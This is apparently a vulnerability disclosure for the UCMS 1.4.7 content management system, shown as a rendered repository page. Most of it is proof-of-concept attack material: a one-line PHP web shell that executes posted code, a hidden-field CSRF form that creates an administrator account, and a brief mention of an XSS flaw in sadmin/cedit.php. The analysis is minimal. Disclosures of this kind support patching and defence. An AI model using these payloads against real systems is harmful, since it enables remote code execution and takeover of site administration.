Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
60 lines (52 sloc) 2.49 KB


Access URL:


Create a 1.php file and submit

Write poc: <?php eval($_POST['123']);?>



After logging in, use POC to create an administrator account.

    <form action="" method="POST">
      <input type="hidden" name="uuu_token" value="02ed31f4" />
      <input type="hidden" name="nickname" value="123" />
      <input type="hidden" name="username" value="test" />
      <input type="hidden" name="psd" value="test" />
      <input type="hidden" name="psd1" value="test" />
      <input type="hidden" name="b[]" value="1" />
      <input type="hidden" name="b[]" value="2" />
      <input type="hidden" name="alevel" value="3" />
      <input type="hidden" name="s[]" value="0" />
      <input type="hidden" name="s_0[]" value="4" />
      <input type="hidden" name="s[]" value="1" />
      <input type="hidden" name="s_1[]" value="0" />
      <input type="hidden" name="s_1[]" value="1" />
      <input type="hidden" name="s_1[]" value="2" />
      <input type="hidden" name="s_1[]" value="3" />
      <input type="hidden" name="s_1[]" value="4" />
      <input type="submit" value="Submit request" />


The vulnerability code is located in ucms_1.4.7\ucms\sadmin\cedit.php

You can see that the htmlspecialchars function is used below to filter, but the above is not filtered, so XSS exists.


The causes of the vulnerabilities are similar, all are unfiltered code, no more specific analysis here.